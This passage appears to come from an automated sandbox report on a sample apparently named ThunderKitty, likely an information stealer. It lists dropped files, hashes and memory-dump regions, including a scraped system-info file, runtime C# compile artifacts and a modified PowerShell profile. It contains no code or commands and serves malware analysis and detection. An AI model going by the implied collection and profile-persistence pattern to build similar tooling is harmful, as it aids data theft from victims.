e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
92df60eb11c4a550a03d9b702974df53

SHA1
a8f2dd3752c2d1de16dac2bb0e5e4b7cb804c441

SHA256
7a8fb78344e605ecb761a5a84d54c0c5e09c76fb8b478e4337df274c005ec73a

SHA512
8bcc5610a4e68527a47861ea4d85e8bc2614844066b4c9d8f655608d67a13fa9eefaee777ab18de0d055dd3d3f74ffd0a6c29d68a94baf7d01c6cbd9df9559dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
826ca040e1f9e84acd20f789d81903f6

SHA1
4d997b017a5cbf868011df6623793770c86a377b

SHA256
eb551c927c34363036e8e2186ff9c7693d0271165358972cf5342f22499fe62a

SHA512
9a013fc1302ce4eeb2781b237c32070ed3008bdb85ab6310eed4064558a2547cf677faeb366a6da112c3d06d53ab83c1693c5c27b6aee8284503ce80c62ab660

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES928B.tmp

Filesize
1KB

MD5
69c9bf74e2eef6b14670f05377f50f29

SHA1
1cd3ea37ba9f76b8306dbe03f42bd0ad56d71b1b

SHA256
c5a2fad14321bfb3116aea8df55fa5432dec602aac41f48e669362bb3207f898

SHA512
2e045a631fb429cd73e23c6af9a4ad013f108466bb8095ae3c52b4397ee7701a93232eceb605f1af9dd63ed62dee6058ca0c5945c2617090cabe85622c450696

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
100KB

MD5
6fb0cdd71c7d2ec9ebd75dbede6b0722

SHA1
877fa56af6d29bed5b1071d248b032f68b371f1a

SHA256
735b641a75f8866c91952913b35050915d3e135eefa88e7200f90d5e00d04d57

SHA512
b3658999efd0a8d181c27f49c94b853547e63f4c932b8739654b1cbf1a61b8d9c80640c2e44bc86b38afe21ada96ac6db0968fcd124de92c765075b705df2b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
838a1a0bbfb64df76a537175a0ba8f5b

SHA1
c20f519f42cb0ce49be87802dedb0893bb3f9d65

SHA256
866fc82dc57a68b9c67441fa02e6d888c3595b18b924cb6eaba265ed7a9d4c0c

SHA512
6efd0b1d462635f40cc2b0a817c95e5420a1c9d99820224edbef674c3a5e297511b71d3cfdcec1165d894cb9d48638180779bb0b7f3e45a473493100686c8cb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0trtztbt.tcb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cdxasvua\cdxasvua.dll

Filesize
4KB

MD5
166ba323480182be9952c8c86112775e

SHA1
b3ec0098965fe4e2d9e72a15fa543b394285bedd

SHA256
27aa1db6e6bc2751b6ccfba65d4993b63f289d46e489831c18ea7cdd331d4e41

SHA512
1a77882886fff9a1767a5b33d4441bc2084a52842134080eb4b959848558527d7b37e5fb9608654bf78024956a12cbf489da39f3e8d87d062eb3eb8583a56325

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cdxasvua\CSC33CBC7B4F80C439AA1565C71DE77EABB.TMP

Filesize
652B

MD5
69088eaab9fb874a604b148ed47b0eee

SHA1
973e05dc5a29e21e1d84d9eaf4db5146db89b6a0

SHA256
10e0286c547d2df9e42e7acbd90cec271d97d68d0a3532963c8012a645c34146

SHA512
19030b57300658a2ab5c38f39ee206351ff44eda178b4d59b3a5c4369d3efb39ce543486e239a29bf170d8b5fdb9c570b10affa3eb475396a24d10055af56fe0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cdxasvua\cdxasvua.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cdxasvua\cdxasvua.cmdline

Filesize
369B

MD5
901d3d4f2d1f8bba8a7ff7d5fc9efa6f

SHA1
2580a888e34875bb4f99cf42d33cf061cfac9e26

SHA256
15476e5a5b909972586008d374e9fc0e0ee1df353c1066cfa42dfa453b8e626a

SHA512
567b3ac477d22860356195a148b3b6ad7b09e4bb975c767fa672982ff4a20d4b7f8146f7c6595b7820ba54aea8a63f4c85b1aa312b13dc7ec8f4b0e5dd6497d9

Download Submit
memory/2716-70-0x00000188ECAD0000-0x00000188ECAD8000-memory.dmp

Filesize
32KB

Download
memory/2716-83-0x00000188ED0D0000-0x00000188ED0F4000-memory.dmp

Filesize
144KB

Download
memory/2716-127-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/2716-37-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/2716-118-0x00000188ED0A0000-0x00000188ED0AA000-memory.dmp

Filesize
40KB

Download
memory/2716-117-0x00000188ED0C0000-0x00000188ED0D2000-memory.dmp

Filesize
72KB

Download
memory/2716-35-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/2716-34-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/2716-82-0x00000188ED0D0000-0x00000188ED0FA000-memory.dmp

Filesize
168KB

Download
memory/3296-2-0x0000021D37A00000-0x0000021D37A22000-memory.dmp

Filesize
136KB

Download
memory/3296-16-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/3296-5-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/3296-66-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/3296-1-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/4556-79-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/4556-38-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/4556-72-0x000001AB364C0000-0x000001AB36C66000-memory.dmp

Filesize
7.6MB

Download
memory/4556-3-0x00007FF8B3DB0000-0x00007FF8B4871000-memory.dmp

Filesize
10.8MB

Download
memory/4556-0-0x00007FF8B3DB3000-0x00007FF8B3DB5000-memory.dmp

Filesize
8KB

Download